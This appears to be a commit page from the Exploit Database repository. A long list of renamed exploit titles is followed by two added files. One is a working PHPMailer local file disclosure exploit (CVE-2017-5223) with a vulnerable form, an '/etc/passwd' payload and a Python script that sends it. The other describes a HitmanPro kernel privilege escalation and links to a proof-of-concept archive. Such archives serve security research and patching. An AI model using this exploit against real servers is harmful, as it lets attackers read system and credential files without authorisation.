Arbitrary Command Execution Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution Gossamer Threads Links 2.x - User.cgi Cross-Site Scripting Gossamer Threads Links 2.x - 'User.cgi' Cross-Site Scripting MegaBook 2.0/2.1 - Admin.cgi EntryID Cross-Site Scripting MegaBook 2.0/2.1 - 'Admin.cgi?EntryID' Cross-Site Scripting PerlDiver 2.31 - Perldiver.cgi Cross-Site Scripting PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site Scripting GlobalNoteScript 4.20 - Read.cgi Remote Command Execution GlobalNoteScript 4.20 - 'Read.cgi' Remote Command Execution Pngren 2.0.1 - Kaiseki.cgi Remote Command Execution Pngren 2.0.1 - 'Kaiseki.cgi' Remote Command Execution Walla TeleSite 3.0 - ts.cgi File Existence Enumeration Walla TeleSite 3.0 - 'ts.cgi' File Existence Enumeration Easy Search System 1.1 - search.cgi Cross-Site Scripting Easy Search System 1.1 - 'search.cgi' Cross-Site Scripting Kryptronic ClickCartPro 5.1/5.2 - CP-APP.cgi Cross-Site Scripting Kryptronic ClickCartPro 5.1/5.2 - 'CP-APP.cgi' Cross-Site Scripting Cholod MySQL Based Message Board - Mb.cgi SQL Injection Cholod MySQL Based Message Board - 'Mb.cgi' SQL Injection BlankOL 1.0 - Bol.cgi Multiple Cross-Site Scripting Vulnerabilities BlankOL 1.0 - 'Bol.cgi' Multiple Cross-Site Scripting Vulnerabilities Web-APP.net WebAPP 0.9.x - /mods/calendar/index.cgi?vsSD' Cross-Site Scripting Web-APP.net WebAPP 0.9.x - '/mods/calendar/index.cgi?vsSD' Cross-Site Scripting Net Clubs Pro 4.0 - imessage.cgi 'Username' Cross-Site Scripting Net Clubs Pro 4.0 - 'imessage.cgi?Username' Cross-Site Scripting Cosmoshop 8.10.78/8.11.106 - Lshop.cgi SQL Injection Cosmoshop 8.10.78/8.11.106 - 'Lshop.cgi' SQL Injection Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities Netwin SurgeFTP 2.3a1 - 'SurgeFTPMGR.cgi' Multiple Input Validation Vulnerabilities WebEvent 4.03 - Webevent.cgi Cross-Site Scripting WebEvent 4.03 - 'Webevent.cgi' Cross-Site Scripting Urchin 5.7.x - session.cgi Cross-Site Scripting Urchin 5.7.x - 'session.cgi' Cross-Site Scripting Google Urchin 5.7.3 - Report.cgi Authentication Bypass Google Urchin 5.7.3 - \Report.cgi' Authentication Bypass Web Terra 1.1 - books.cgi Remote Command Execution Web Terra 1.1 - 'books.cgi' Remote Command Execution D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi D-Link DSL-2730B Modem - 'Lancfg2get.cgi Persistent Cross-Site Scripting Zenoss 3.2.1 - Remote Authenticated Command Execution Zenoss 3.2.1 - Authenticated Remote Command Execution Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit) Gemtek CPE7000 - WLTCS-106 'sysconf.cgi' Unauthenticated Remote Command Execution (Metasploit)
This commit is contained in:
Offensive Security
parent
c9ca104d1d
commit
e515bac4fe
3 changed files with 328 additions and 242 deletions
65
platforms/php/local/43056.py
Executable file
65
platforms/php/local/43056.py
Executable file
|
|
@ -0,0 +1,65 @@
|
|||
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
|
||||
# Date: 2017-10-25
|
||||
# Exploit Author: Maciek Krupa
|
||||
# All credit only to Yongxiang Li of Asiasecurity
|
||||
# Software Link: https://github.com/PHPMailer/PHPMailer
|
||||
# Version: 5.2.21
|
||||
# Tested on: Linux Debian 9
|
||||
# CVE : CVE-2017-5223
|
||||
|
||||
// PoC //
|
||||
|
||||
It requires a contact form that sends HTML emails and allows to send a copy to your e-mail
|
||||
|
||||
// vulnerable form example //
|
||||
|
||||
<?php
|
||||
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
|
||||
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
|
||||
$mail = new PHPMailer();
|
||||
$mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
|
||||
$address = "admin@localhost";
|
||||
$mail->AddAddress($address, "root");
|
||||
if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
|
||||
$mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
|
||||
$mail->MsgHTML($_POST["your-message"]);
|
||||
if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
|
||||
}
|
||||
?>
|
||||
<form action="/contact.php" method="post">
|
||||
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></span> </label></p>
|
||||
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></span> </label></p>
|
||||
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
|
||||
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span>
|
||||
<p><input type="submit" value="submit" /></p>
|
||||
|
||||
// exploit //
|
||||
|
||||
Put <img src="/etc/passwd"> in the message (or other file to disclose).
|
||||
|
||||
// python code //
|
||||
|
||||
#!/usr/bin/python
|
||||
import urllib
|
||||
import urllib2
|
||||
|
||||
poc = """
|
||||
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
|
||||
# Date: 2017-10-25
|
||||
# Exploit Author: Maciek Krupa
|
||||
# All credit only to Yongxiang Li of Asiasecurity
|
||||
# Software Link: https://github.com/PHPMailer/PHPMailer
|
||||
# Version: 5.2.21
|
||||
# Tested on: Linux Debian 9
|
||||
# CVE : CVE-2017-5223
|
||||
"""
|
||||
|
||||
url = 'http://localhost/contact.php'
|
||||
email = 'attacker@localhost'
|
||||
payload = '<img src="/etc/passwd"'
|
||||
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
|
||||
data = urllib.urlencode(values)
|
||||
req = urllib2.Request(url, data)
|
||||
response = urllib2.urlopen(req)
|
||||
html = response.read()
|
||||
print html
|
||||
19
platforms/windows/local/43057.txt
Executable file
19
platforms/windows/local/43057.txt
Executable file
|
|
@ -0,0 +1,19 @@
|
|||
Exploit-CVE-2017-6008
|
||||
|
||||
The CVE-2017-6008 is a vulnerability in the HitmanPro scan that allows privilege escalation by exploiting a kernel pool buffer overflow. The exploits here use the Quota Process Pointer Overwrite attack as described in the Tarjei Mandt's paper
|
||||
|
||||
Also, the exploits use my Pool sprayer library
|
||||
|
||||
You can find a detailed paper on the Windows 7 exploit here:
|
||||
https://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/
|
||||
|
||||
Windows 10 version
|
||||
|
||||
This version use another vulnerability in the hitmanpro37.sys driver, an Out-Of-Bounds read, which we use to leak the Pool Cookie. This leak allows us to use the very same attack on Windows 10.
|
||||
|
||||
You can find a detailed paper of the exploit on Windows 10 here (coming soon):
|
||||
https://trackwatch.com/
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43057.zip
|
||||
Loading…
Add table
Reference in a new issue